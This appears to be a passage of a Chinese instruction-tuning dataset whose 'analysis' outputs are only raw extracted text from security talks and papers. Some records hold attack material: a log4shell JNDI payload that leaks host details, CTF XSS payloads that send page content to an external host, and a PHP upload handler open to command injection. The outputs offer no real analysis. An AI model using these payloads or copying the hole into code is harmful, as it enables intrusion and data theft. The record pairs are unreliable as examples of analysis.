模式Coherent和Sco) .TP 0.5i .B -w Turns linewrap on at startup by default. .TP 0.5i .B -a .BR 特性使用 有些终端特别是televideo终端 有个很讨厌的特性处理(串行而非并行) minicom缺省使用`-a on'但若你在用这样的 终端你就可以(必须!)加上选项`-a off'尾字`on'或`off'需要加上 .TP 0.5i .B -t .BR 终端类型 使用此标志 你可以重载环境变量TERM 这在环境变量MINICOM 中使用很方便 你可以创建一个专门的 termcap 入口以备minicom 在控制台上使用它将屏幕初始 化为raw模式 这样 连同`-f'标志一起就可以不经翻译而显示IBM行字符 .TP 0.5i .B -c .BR 颜色 使用有些终端(如Linux控制台)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA Few Comments on Mind Games \"the only way you can tell the truth,\" a friend at NSA said, \"is through fiction\" ... so I did ... \"Mind Games\" is a unique collection of 19 stories of brave new worlds and alternate realities - stories of computer hackers, deception and intelligence, puzzling anomalies, spirituality and mysteries of consciousness, the paranormal, UFOs, alien life forms - in short, everyday life in the 21st century. All have been previously published in literary, slipstream, and science fiction magazines and anthologies but have not been available in a single collection - until now. The most common response to Thieme's writing and speaking is: \"You made me think.\" This first edition is beautifully illustrated and published by Duncan Long Publications. It is available for the Kindle at http://www.amazon.com/dp/B003MC5ETA and in e-pub for the Nook. The retail price is $20 in print or $9.99 for an ebook. The depth, complexity, and texture of Richard Thiemes thought processes break the mold. Brian Snow, Senior Technical Director, NSA (ret) Thiemes ability to communicate complex, abstract concepts and personalize them is like verbal origami. - Jeff Moss, Director, Black Hat, a division of TechWeb/United Business Media, and a member of the DHS HSAC Silent Emergent, Doubly Dark is ... very imaginative writing, with a complexity that raises [the story] to the fringes of slipstream. Were left wondering whats real and whats not .... Steven Pirie, /The Future Fire/ Beautiful descriptions and intriguing concepts ... The Fix (UK). Thiemes clarity of thinking is refreshing, and his insights are profound. Bruce Schneier, security technologist and author. Buy this book!  Robert Morris, Sr. Chief Scientist, NSA (ret), holding up /Islands in the Clickstream /at the Black Hat Briefings/. / The reader is left reeling, dizzy with insight. Robin Roberts, Information Security R&D, CIA (ret) \"Richard Thieme takes us to the edge of cliffs we know are there but rarely visit. He w", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRep.%Jim%Langevin D-Rhode(Island,(2nd District US%House%of%Representatives @JimLangevin Rep.%William%Hurd R-Texas,(23rd District US%House%of%Representatives @HurdOnTheHill Bridging'the'Gap'Between'DC'and'DEF'CON #DC2DEFCON Joshua%Corman Founder,(I(Am(The(Cavalry Director,(Cyber(Statecraft(Initiative Atlantic%Council @joshcorman www.iamthecavalry.org @iamthecavalry Safer | Sooner | Together @joshcorman @IamTheCavalry HHS Task Force FDA Guidance DOJ Work Group DOD Strategy EU Guidance DOC/NTIA Guidance Presidential Commission Report FTC Guidelines DOT Principles NHTSA Guidance DHS Guidance Government)has)noticed)in)the)last)18)months Rep.%Jim%Langevin D-Rhode(Island,(2nd District US%House%of%Representatives @JimLangevin Rep.%William%Hurd R-Texas,(23rd District US%House%of%Representatives @HurdOnTheHill Bridging'the'Gap'Between'DC'and'DEF'CON #DC2DEFCON Joshua%Corman Founder,(I(Am(The(Cavalry Director,(Cyber(Statecraft(Initiative Atlantic%Council @joshcorman", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEric Sesterhenn <eric.sesterhenn@x41-dsec.de> 2018 X41 D-SEC GmbH https://www.x41-dsec.de/ 1 / 30 whoami  Eric Sesterhenn  Principal Security Consultant  Pentesting/Code Auditing at X41 https://www.x41-dsec.de/ 2 / 30 Disclaimer  The issues presented here have been reported and fixed!  These are open source projects - help them!  I am not interested in testing / debugging proprietary stuff in my spare time. DEF CON 2018 3 / 30 Targets LINUX LOGIN DEF CON 2018 4 / 30 Why?  Smartcards control authentication!  Authentication runs as root!  Users and programmers subconsciously trust the smartcard! DEF CON 2018 5 / 30 Smartcards User Smartcard Reader Reader Driver (PC/SC) Login (pam) Smartcard Driver (OpenSC) DEF CON 2018 6 / 30 What is a Smartcard?  Physical, tamper-proof device  Designed to keep information secret  Contains memory and a processor https://en.wikipedia.org/wiki/Smart_card#/media/File:SmartCardPinout.svg DEF CON 2018 7 / 30 Application Protocol Data Unit  APDUs form the protocol to talk to smartcards  ISO/IEC 7816-4 Identification cards - Integrated circuit cards  T=0 is character oriented / T=1 is block-oriented  Verify: 00 20 00 01 04 31323334 CLA INS P1 P2 LC Data 1 1 1 1 0-3 NC DEF CON 2018 8 / 30 PC/SC API  PC/SC API can be used on win and *nix  Other libraries have a similar interface LONG WINAPI SCardTransmit( SCARDHANDLE hCard, LPCSCARD_IO_REQUEST pioSendPci, LPCBYTE pbSendBuffer, DWORD cbSendLength, PSCARD_IO_REQUEST pioRecvPci, LPBYTE pbRecvBuffer, LPDWORD pcbRecvLength ); DEF CON 2018 9 / 30 PKCS11  PKCS11 is a platform independent API for cryptographic token  Supported by OpenSSL, browsers,... (eg. via libp11)  Windows uses smartcard Minidriver now  Driver for each card, uses ATR to match CK_RV C_FindObjectsInit( CK_SESSION_HANDLE hSession, CK_ATTRIBUTE_PTR pTemplate, CK_ULONG ulCount ); DEF CON 2018 10 / 30 Smartcard Stack Summary Application (pam) PKCS11 PC/SC APDU Physical Card DEF CON 2018 11 / 30 Smartcard for Sign-On PAM Smartcard CRLServer", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nlog4shell 0x00 log4shell anyway 0x01 waf rasp 1. wafrasphidssoc 2. rasp log4j 0x02 1. nolookupstrue 2. key 3. jdkrce 1nolookups nolookupstruelookup log4jXMLlookup log.error(\"${sys:java.version}\"+\"xxxxx\") lookup java version lookup 1. 2. lookup 3. lookupGitHub 2 1. jvm -Dlog4j2.formatMsgNoLookups=true 2. classpathlog4j2.component.propertieslog4j2.formatMsgNoLookups=True 3. FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS true 1. 2.10 2. key LOG4J_log4j2_formatMsgNoLookups=True 3jdk jdkdnslogjdk gadgetspringboot https://mp.weixin.qq.com/s/vAE89A5wKrc-YnvTr0qaNg 0x03 nolookupsfalselookuprc1 nolookupstrue 1. rc1rc2nolookupstrue 2. jndifalse 3. lookup lookup jndilookupnolookups=false log4j2jndilookuplookupjndi 0x04 ${jndi:dns://xxx.xxx.xxx.xxx:port/${hostName} -${sys:user.dir}- ${sys:java.version} - ${java:os}} vpsudp RCE", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# CoolNAME Checker [324 points] (19 solves) Files: - This challenge provided a [link](http://reverse-lookup.hackable.software) ## Part 0: research The website allows us to enter an IP and the server will make a DNS request to it (judging from the name it's going to be a CNAME DNS query). Below is a quick nonce solver we used, which was executed with a simple JS script in console. ```js const nonce = document.querySelector('input[name=\"nonce\"]').value; fetch('https://%REDACTED%', { method: 'POST', body: nonce }) .then(res => res.text()) .then(res => document.querySelector('input[name=\"pow\"]').value = res); document.querySelector('input[name=\"srv\"]').value = \"%REDACTED%\"; ``` The button *show to admin* hinted at an XSS vuln. We ran a simple python DNS server from [here](https://gist.github.com/samuelcolvin/ca8b429504c96ee738d62a798172b046). This allowed us to return arbitrary responses quite easily. ```python from time import sleep from dnslib import RR from dnslib.server import DNSServer #PAYLOAD = '<script>fetch(\\'%REDACTED\\',{body:document.body.innerHTML,method:\\'POST\\'})</script>' #PAYLOAD = '<script/src=\\'%REDACTED%\\'></script>' PAYLOAD = '<img/src=\\'%REDACTED%\\'>' class Resolver: def resolve(self, request, handler): reply = request.reply() resname = str(request.q.qname)[:-1] reply.add_answer(*RR.fromZone(resname + ' 2137 CNAME ' + PAYLOAD)) return reply if __name__ == '__main__': resolver = Resolver() s = DNSServer(resolver, port=53, address='0.0.0.0', tcp=False) s.start_thread() try: while 1: sleep(0.1) except KeyboardInterrupt: pass finally: s.stop() ``` ## Part 1: solution We quickly realised, that above payloads worked on local side - meaning that XSS was working, but we couldn't get admin to hit our requestbin. On top of that, payload couldn't contain spaces. It took us quite some time to read challenge carefully. *Only udp/53 outgoing traffic allowed from server*. That meant we needed to smuggle flag in a DNS query. Final payload: ```html <script>window.lo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n<?php if (!empty($_FILES)): $ext = pathinfo($_FILES['file_upload']['name'], PATHINFO_EXTENSION); if (!in_array($ext, ['gif', 'png', 'jpg', 'jpeg'])) { die('Unsupported filetype uploaded.'); } $size = shell_exec(\"identify -format '%w x %h' {$_FILES['file_upload']['tmp_name']}\"); echo \"Image size is: $size\"; else: ?> <form method=\"post\" enctype=\"multipart/form-data\"> File: <input type=\"file\" name=\"file_upload\"> <input type=\"submit\"> </form> <?php endif;", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n|=-----------------------------------------------------------------------=| |=----------------------=[ Sniffing Keystrokes With ]=------------------=| |=----------------------=[ Lasers and Voltmeters ]=------------------=| |=-----------------------------------------------------------------------=| |=-----------------------------------------------------------------------=| |=-----------------=[ By Andrea \"lcars\" Barisani ]=--------------=| |=-----------------=[ <lcars_at_inversepath_dot_com> ]=--------------=| |=-----------------=[ ]=--------------=| |=-----------------=[ Daniele \"danbia\" Bianco ]=--------------=| |=-----------------=[ <danbia_at_inversepath_dot_com> ]=--------------=| |=-----------------------------------------------------------------------=| --[ Contents 0. DISCLAIMER 1. Introduction 2. Motivation 3. First Attack: Theory 4. The PS/2 Signal 5. Implementation 6. Data Analysis 7. Results 8. Attack Scenario and Workarounds 9. Second Attack: Theory 10. Implementation 11. Data Analysis 12. Results 13. Attack Scenario and Workarounds I. FAQ II. References III. Links --[ 0. DISCLAIMER All the equipment and/or circuits and/or schematics provided in the presentation must be treated as examples, use the presented information at your own risk, remember safety first. --[ 1. Introduction The exploitation of Electromagnetic Emanations and similar Side Channels has always been one of the most interesting and \"exotic\" areas of attack in the security field. In the late 60's and early 70's the term TEMPEST[1] was coined to title an NSA operation which aimed to secure electronic equipment from leakage of compromising emanations. Well known TEMPEST research describes remote eavesdropping of CRT displays and most recently LCD displays, as well as optical emanations from appliances LED indicators. Our research details two attacks, one against wired PS/2 keyboards, the other against laptop keyboards using respectively power line leakage and optical sampling of mechanical ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Anatomy of Drug Testing Legal Stuffs  Scheduling The purpose  Schedule I No medical use/Highly addictive  Schedule II Some medical application/Highly addictive  Schedules III / IV Legal Stuffs (cont.)  The DOT  COC  Securing the location  BAT  COC  Police vs. Hospitals/Collection sites Methodologies  EIA and ELISA  Spectrophotometry  Chemiluminescence  GC/MS (Gas Chromatography/ Mass Spectrophotometry)  Breathalyzer Sample types  Hair  Urine  Blood  Stool Meconium  Breath  Body tissues/fluids Commonly Tested Drugs (legal)  Amphetamines  TCAs (anti-depressants)  Oxycodone  Barbituates  Benzodiazapines  Salicilate  Acetametaphine Commonly Tested Drugs (illicit)  Cocaine  Methamphetamines  MDMA (ecstasy)  Opiates  PCP  THC Uncommonly Tested Drugs  LSD  Psyllicibin (Mushrooms)  DMT  Mescaline  Peyote  Nitrous Oxide Putting it all together!", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGrendel Scan Grendel-Scan Distribution Written entirely in Java Written entirely in Java Uses Eclipses Standard Widget Toolkit (SWT) Windows, Linux and Mac builds Only requirement is JRE 1.5 or later Primary Libraries Apache HTTP Components - http://hc apache org/ Apache HTTP Components http://hc.apache.org/ Highly modified version of the Cobra HTML DOM parsing engine - http://lobobrowser.org/cobra.jsp Apache Derby (embeded SQL database) - http://db.apache.org/ M ill Rhi (J S i t i ) Mozilla Rhino (JavaScript engine) - http://www.mozilla.org/rhino/ Miscellaneous Apache Commons components - p p http://commons.apache.org/ Nikto 2 database (used with permission) Design Philosophy False positives vs false negatives False positives vs. false negatives False positives are easy to manually test for False negatives require a full pen test to find False negatives require a full pen test to find Extensibility Pushing abstract logic to shared libraries simplifies test module development Application Walkthrough Product Roadmap Version 1 1 Version 1.1 Multi-part MIME encoded POST bodies SSL/TLS configuration testing PDF and XML report formats Support for one-time passwords & authentication domains Parameter incrementing Upstream proxy authentication Test module: Brute-force authentication Test module: Brute-force authentication Test module: Error-based username enumeration Product Roadmap Version 1 2 Version 1.2 Automated AJAX navigation Full featured HTTP fuzzer Support for client SSL certificates Version 1.3 Reports of new and remediated vulnerabilities Reports of new and remediated vulnerabilities between scans Support for graphs in reports Ability to save and resume scans Ability to save and resume scans Demonstration Environment SLAX based LiveCD SLAX-based LiveCD Server (Typical LAMP Stack): Apache HTTPD (from Slackware, defaults + p ( , mod_php) MySQL (from Slackware, defaults) PHP 4 PHP 4 Zencart 1.1.2 (c. February 2004, known vulnerabilities) Client Client Mozilla FireF", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPropLANE!! Kind!of!keeping!the!NSA!from! watching!you!pee! Introduc9on!  The!guys!up!here!  Mark!Carey!(phorkus)!  Russ!Rogers!(russr)!  Ryan!Clarke!(L0stboy)!  Rob!Bathurst!(evilrob)!  Guys!not!up!here!  You! History!of!Crypto!Part!I!  Scytale!  Caesar!Cipher!  One!Time!Pad!(OTP)!  Enigma!Machine!  SIGABA!  Data!Encryp9on!Standard!(DES)!  Advanced!Encryp9on!Standard!(AES)! Recent!Things!in!History!!  The!NSA!vacuum!  Is!TOR!safe!?!?!!  The!Freenet!Project! The!Project! The!Pile! The!PropLANE!  The!Idea!!  .gov!style!network!protec9on!for!the!masses!  Why!did!we!do!this?!  we!too!like!to!keep!our!shit,!our!shit,!and!just!our! shit!  How!did!we!do!this?!  DARPA!CFT! The!Parts!Part!I!  DC!20!Badge!!  Parallax!Propeller!Chip!  16!User!I/O!Pins!  SPI!Boot!ROM!  TTL!Serial[to[USB!  Infrared!Transceiver! The!Parts!Part!II!  Addi9onal!Items!  Ethernet!Transceiver!  Microchip!ENC28J60!  !3.3/5v!  8k!Sta9c!Ram!Buffer!  If!you!dont!use!this,!you!will!have!to!write!your!own! driver!  SD!Card!(keystore)!  Almost!any!SD!card!will!work! The!Sobware!  Spin!  high!level!programming!language!  byte!code!interpreter!  learn.parallax.com!  PASM!  Propeller!Assembly!  Faster!  pPropellerSim/GEAR! Fair!Warning!  Synthesized!SPI!using!specialized!COG! instruc9ons!  Transparent!bridging!  Small!key!size!(128!vs!256)!due!to!size! constraints! Warning!About!Crypto!  Why!crypto!works!  Hash!vs!Encryp9on!  Crypto!can!be!defeated!  Losing!your!symmetric!key!  Compromised!PKI!  Brute!Force!  Poor!Implimenta9on! Money!Shot! The!Problem! Approach!  Cheap!  Propeller!  Arm!  Fast[ish!  Propeller!(not!so!fast)!  ARM!(can!be!fast)!  FPGA!(screaming!fast)!  !Easy!to!use!  Simple!key!exchange!  ON/OFF!switch! The!Badge! DC!20!Badge! Badge!Schema9c! Pinout! Pinout! PropLANE!Sobware! How!a!Propeller!Works!  Cogs!  Jobs!  Spin/PASM!  What!if!I!want!to!port!it?! The!Crypto!Cog!  Encrypt!Cog!  Decrypt!Cog!  Speed!Test!  Basic!Sequence!  Packet!In!  Mem!Copy!  Decrypt!  Read/Write!  Encrypt!  Mem!Copy!  Pack", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDFIR(Digital Forensics and Incident Response) 数字取证和应急响应 一.介绍 二.正文 1. mess #DFIR 地址: https://twitter.com/0gtweet/status/1305887051976511489 通常我们运行一个程序会在prefetch目录缓存用来加速程序的运行 *.pf文件,也叫预读取功能加快 系统启动文件读取速度 默认路径 c:\\windows\\prefetch 仔细观察会发现有两个CHRROME.exe程序因此在渗透中exe不得不落地到目标磁盘上时也要重 命名可以改为dllhost,mmc,rundll32,svchost等等 # 说明: 纯粹是在学习代码后当娱乐看的如有错误还请包涵 # By bopin 最近在推上持续关注着一位搞安全研究的大佬主要领域是: 内存转储(rdrleakdiag白利用就是他的杰 作)LOLBins本次带来的内容是关于DFIR的看官请听我仔细到来 推特:https://twitter.com/0gtweet Github:https://github.com/gtworek/ 2. EntClientDb.edb 应用的数据库文件 一般包含视频音乐等作者也写了一个ps脚本用来解析EntClientDb.edb文件 https://github.com/gtworek/PSBits/blob/master/DFIR/Analyze_EntClientDb.ps1 仔细阅读这些注意事项说说我踩过的坑把 # The script performs an analysis of the EntClientDb.edb, specifically, the \"TblFile\" table containing paths. # For your own safety, please work on the copy of the EntClientDb.edb file and not on the original one: %LOCALAPPDATA%\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState\\Database\\an onymous\\EntClientDb.edb even if the script opens it readonly. # Analysis of the database may be made without any special permissions, but gathering the file itself is a bit more challenging. I can suggest one of the following ways: # 1. kill the Video.UI.exe process # 2. offline copy (such as copy from disk image, by booting from usb etc.) # 3. copy from the vss snapshot # SET IT TO YOUR COPY OF EntClientDb.edb 没有停止相关程序 帮助链接: https://twitter.com/0gtweet/status/1306509670585176064 停止相关进程后然后复制 edb到别的路径下作者是这样说的It should work on the copy, and not on the original file. 当然也可以使用handle 获取指定进程的信息 .edb handle.exe 微软官方下载地址: https://docs.microsoft.com/en-us/sysinternals/downloads/handle GUI版: Process Explorer: https://docs.microsoft.com/en-us/sysinternals/downloads/process-explo rer 3. DFIR Prefetch研究 https://twitter.com/0gtweet/status/1306914319012163584 3.1 Cleanup Prefetch 文件默认太大就会被清理如果CPU处于空闲时且大小超过了 256 / 10MB的一半清理程 序会周期性开始工作 3.2 MaxPrefetchFiles 最大数值 管理员可以更改MaxPrefetchFiles和MaxPrefetchFilesSize的大小注册表位置 HKLM\\SOFTWARE\\Microsoft\\Win", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUTILIZING POPULAR WEBSITES FOR MALICIOUS PURPOSES USING RDI Daniel Chechik, Anat (Fox) Davidi Security Web Scanners What is RDI? 3 Reflected DOM Injection Legit Legit Malicious A Recipe for Disaster 4  1 simple web page A Recipe for Disaster 5  1 simple web page  1 trustworthy web utility A Recipe for Disaster 6  1 simple web page  1 trustworthy web utility  1 script that behaves differently within a certain context RDI in Action  Yahoo Cache 7 Yahoo Cache What just happened?! 8 What just happened?! 9 What just happened?! 10 What just happened?! 11 What just happened?! 12 Lets take it a step further 13 Google Translate Go back in time (10 minutes ago) 14  Producing a malicious URL hosted on Google  We will be able to access it directly without the interface: hxxp://translate.google.com/translate?hl=en&sl=iw &tl=en&u=http%3A%2F%2Fhandei.ueuo.com%2Ftra n.html What happens behind the scenes 15 What happens behind the scenes 16 What happens behind the scenes 17 What happens behind the scenes 18 Content is translated Lets Check Out the Code 19  After the text is translated, the malicious code is generated, decrypted and executed script Bob Marley Lets Check Out the Code 20  After the text is translated, the malicious code is generated, decrypted and executed script Bob Marley Generated Lets Check Out the Code 21  After the text is translated, the malicious code is generated, decrypted and executed script Bob Marley Decrypted Lets Check Out the Code 22  After the text is translated, the malicious code is generated, decrypted and executed script Bob Marley Executed Reflected DOM Injection 23  RDI is a technique  Context makes the difference  Very hard to detect  RDI is awesome! VirusTotal / Wepawet ? 24 VirusTotal / Wepawet ? 25 VirusTotal / Wepawet ? 26 VirusTotal / Wepawet ? 27 Thank You! 28 Q A Daniel Chechik: dchechik@trustwave.com @danielchechik Anat (Fox) Davidi: adavidi@trustwave.com @afoxdavidi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMobile Hacker Spaces Thomas Wilhelm About the Talk  Concept behind Hacker Spaces  (Dis)Advantages of Mobile Hacker Spaces  Real-World Example About the Talker  Thomas Wilhelm Contributing Author: About the Talker  Thomas Wilhelm  Certifications: ISSMP CISSP SCSECA  Work:  Fortune 50 Company  Penetration Testing & Risk Assessments  Adjunct Professor  Education:  PhD Student (IT - Information Security) Concept Behind Hacker Spaces (Sorry if you know this already)  Definition (hackerfoundation.org):  Any gathering of Hackers as a community to share ideas, collaborate on projects or merely enjoy each other's company could be considered a hacker space.  4 Types:  Local Gatherings  Conventions  Hacker Group Living Situations  Fixed Hacker Research Spaces My mind  Oooh! I want one! Hacker Spaces  A Few Hacker Spaces:  CCC: Chaos Computer Club  2k+ members  C-Base  300 members  NYC Resistors  18 members My Mind  Larger than what Im willing to do Cost of a Hacker Space  Cost:  C-Base (300 members)  July  Almost went bankrupt  Received 20,000 of the needed 30,000 Euros needed in 6 weeks1  NYC Resistors (18 members)  can get a place near Lemur, looking at around $2,2502  Local Rent: 1250 sq.ft. @ $800/mo My Mind  Just too expensive Hacker Spaces - Ideas  Garage Advantages:  Free (not really, but at least not extra)  Power  Convenient Hacker Spaces - Ideas  Garage Disadvantages:  Cold in winter (live in Colorado)  Availability to users  and (yes, you guessed it) Hacker Spaces - Ideas What a dump. My Mind   Yeah Im not cleaning that. Hacker Spaces - Ideas  Other ideas:  Room in house  Too Stressful  Diners / Restaurants  No permanency  Local College  Scheduling / Sponsorship Brainstorming  What did I want: Cheap (Im a student, remember?) Isolated from neighbors Modular Place for classes Cool (optional. VERY optional) Mobile Hacker Space  Used Buses  Minibus Chevy 3500 Diesel 1999 USD $15,900  Charter bus Chevy P-30 1995 USD $4000  Minibus GMC Shuttle Bus 2002 USD $22,950  Minibu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCanaan Kao, Chuang Wang, I-Ju Liao canaan@totoro.cs.nthu.edu.tw canaan_kao@trend.com.tw SOME THINGS BEFORE NETWORK ATTACK (A LONG TIME OBSERVATION) 網路攻擊之前的二三事 AGENDA  The Motivation  Port Scan 101  IDS/IDP-based Port Scan Detection  Honeypot-based Port Scan Detection  Play with SDN switch  A Long Time Observation  A legacy of Anti-Botnet Project 2014/8/22 SOME THINGS BEFORE NETWORK ATTACK 2 WHO AM I?  十幾年前在讀大學的時候寫 OpenSource 的網 管軟體報告抽簽抽到 Snort.  後來在一家做 IDS/IPS 的公司寫了十幾年的 code  之後意外地在我青春的尾巴執行了教育部的 Anti-botnet 計畫五年辦了四屆的 Botnet of Taiwan (BoT)研討會  不要問我今年有沒有 BoT2014?  去年不小心成為 Anti-Virus 廠商的員工 2014/8/22 SOME THINGS BEFORE NETWORK ATTACK 3 WHO AM I? 一些曾經講過的  2010 Spam Source Detection at Home  http://www.anti-botnet.edu.tw/content/confs/BoT2010.PPTs/B5.php  2012 The Botnet Traffic Forensics System  http://www.anti-botnet.edu.tw/content/confs/BoT2012.PPTs/B5.php  2013 APT/Malware Traffic Detection  http://www.anti-botnet.edu.tw/content/confs/BoT2013.PPTs/B5.php 2014/8/22 SOME THINGS BEFORE NETWORK ATTACK 4 一些縮寫  IDS: 不具備阻擋功能的入侵偵測系統  EX: Snort  IPS: 具備阻擋功能的入侵偵測系統  EX: Snort-inline  FW: FireWall 防火牆  EX: NetFilter / iptables  LAN: 以 FW 為界的內網  WAN: 以 FW 為界的外網  SDN: Software-defined Network 2014/8/22 SOME THINGS BEFORE NETWORK ATTACK 5 THE MOTIVATION 關於內賊(BOT)的偵測位置 2014/8/22 SOME THINGS BEFORE NETWORK ATTACK 6 THE MOTIVATION 關於偵測的時機 2014/8/22 SOME THINGS BEFORE NETWORK ATTACK 7 THE MOTIVATION 只能事後偵測嗎  假設 Malware 透過行動載具或是其他方式 已經進入到內網我們有什麼方式可以察 覺或是阻止內網的設備 受到攻擊/感染  或是我們只能做尋找哪些主機已經變成 bot 的事後偵測?  如果攻擊的封包完全不經過 GW / FW / IDS / IPS那我們還能偵測得到嗎 2014/8/22 SOME THINGS BEFORE NETWORK ATTACK 8 THE MOTIVATION IDS/IPS 產業公開的秘密 2014/8/22 SOME THINGS BEFORE NETWORK ATTACK 9  針對網路上的攻擊基本上是廠商必 須先拿到攻擊樣本或是惡意程式其 所屬的 IDS 或是 IPS 才會有偵測率  所以如果遇到 0day或是新式攻擊 被攻擊成功的機會就很大  因此針對 Botnet / APT做事後的偵 測是比較有把握的  But. THE MOTIVATION 看個新聞 (智慧家電越來越多了) 2014/8/22 SOME THINGS BEFORE NETWORK ATTACK 10  來源蘋果日報 THE MOTIVATION 以後家庭生活都可以透過網路控制 2014/8/22 SOME THINGS BEFORE NETWORK ATTACK 11 http://server1.she777.com/images/www.jo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCalculating Risk in the Era of Obscurity Reading Between the Lines of Security Advisories Brian Gorenc, Director of Vulnerability Research Dustin Childs, Sr. Communications Manager #BHUSA @BlackHatEvents August 10-11, 2022 BRIEFINGS #BHUSA @BlackHatEvents Who we are and why were here #BHUSA @BlackHatEvents (Mis)Calculations of Risk #BHUSA @BlackHatEvents Inconsistency in the calculation of CVSS #BHUSA @BlackHatEvents Merging unique bugs into a single CVE #BHUSA @BlackHatEvents Removing details from security advisories #BHUSA @BlackHatEvents Placebo Patches Incomplete Updates and Half Measures #BHUSA @BlackHatEvents Placebo Patches #BHUSA @BlackHatEvents Adobe Acrobat Point Fixes #BHUSA @BlackHatEvents Adobe Acrobat Point Fixes #BHUSA @BlackHatEvents CVE-2019-0604: SharePoint Re-Runs Vendor ships a bug First Vendor Patch Sells Bug Report Vendor Notified Active Attacks In the Wild Patch Revision 2.0 Blog Published Sells Bug Report (Again) Patch Revision 3.0 #BHUSA @BlackHatEvents Other Examples? #BHUSA @BlackHatEvents Challenges in Patching #BHUSA @BlackHatEvents Understanding the Cottage Industry of Diffing and Disclosure #BHUSA @BlackHatEvents Building a cottage industry from patches #BHUSA @BlackHatEvents An alternative view of the disclosure timeline #BHUSA @BlackHatEvents Case Study: CVE-2021-21220 Chrome+Edge Vendor ships a bug Researcher demos bug at Pwn2Own Sells Bug Report ($100K) At Pwn2Own 2021, Chrome and Edge are targeted using the same exploit Bruno Keith & Niklas Baumstark of Dataflow Security demonstrate their exploit Successful demonstration earns them $100,000 Chrome development team notified in person during the competition Working Exploit Vendor Patches Fix checked in to open-source V8 JavaScript engine, but not integrated into the browser. Code Check-In By reversing a code check-in, a researcher published a working exploit within 48 hours Chrome patch released on April 13 (n+4 Days) Edge patch released the following day #BHUSA @BlackHatEvents Diff", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMI-CASA SU-CASA Elliott Thompson Principle Consultant | OSCP | CTL | CCT-APP 192.168.1.1 192.168.1.1 ?? CACHE-CONTROL: MAX-AGE= 31536000 C KIES BROWSER Close the browser & all profiles Close the browser Close the browser Close the browser Close the tab Appears to ignore the flag Expires = Session JAVASCRIPT CACHE COOKIES JAVASCRIPT HTTPS://VK.COM:443 /BLOG?CATEGORY=1 KARMA DINO DAI ZOVI SHAUN MACAULAY DEAUTHENTICATION ? ? PREFERRED NETWORK LIST PROBE ? YEAH THATS ME! SWEET ? DISCONNECTED ? 192.1 <HTM ??.??.??.?? 10.0.0.0/8 172.16.0.0/12 172.16.0.0/12 192.168.0.0/16 192.168.1.1 192.168.0.1 192.168.1.254 10.0.0.138 192.168.2.1 192.168.254.254 10.0.1.1 192.168.3.1 10.10.1.1 10.0.0.1 10.0.0.2 10.1.1.1 192.168.11.1 192.168.0.30 192.168.0.50 192.168.0.10 192.168.0.101 192.168.15.1 10.90.90.90 192.168.8.1 192.168.86.1 192.168.1.200 192.168.100.1 192.168.123.254 192.168.1.10 192.168.1.210 192.168.1.99 192.168.16.1 192.168.10.1 192.168.20.1 192.168.30.1 192.168.62.1 192.168.102.1 192.168.0.227 192.168.10.50 10.1.10.1 192.168.0.3 192.168.168.168 192.168.50.1 192.168.55.1 192.168.251.1 192.168.0.254 192.168.0.100 192.168.1.100 192.168.10.10 192.168.10.100 192.168.223.100 200.200.200.5 192.168.1.20 192.168.4.1 192.168.100.100 192.168.2.254 192.168.1.220 192.168.178.1 192.168.1.1 192.168.0.1 192.168.1.254 10.0.0.138 192.168.2.1 192.168.254.254 10.0.1.1 192.168.3.1 10.10.1.1 10.0.0.1 10.0.0.2 10.1.1.1 192.168.11.1 192.168.0.30 192.168.0.50 192.168.0.10 192.168.0.101 192.168.15.1 10.90.90.90 192.168.8.1 192.168.86.1 192.168.1.200 192.168.100.1 192.168.123.254 192.168.1.10 192.168.1.210 192.168.1.99 192.168.16.1 192.168.10.1 192.168.20.1 192.168.30.1 192.168.62.1 192.168.102.1 192.168.0.227 192.168.10.50 10.1.10.1 192.168.0.3 192.168.168.168 192.168.50.1 192.168.55.1 192.168.251.1 192.168.0.254 192.168.0.100 192.168.1.100 192.168.10.10 192.168.10.100 192.168.223.100 200.200.200.5 192.168.1.20 192.168.4.1 192.168.100.100 192.168.2.254 192.168.1.220 192.168.178.1 TEW-432BRPV3 192.168.1", "category": "text_analysis", "source": "security_papers"}
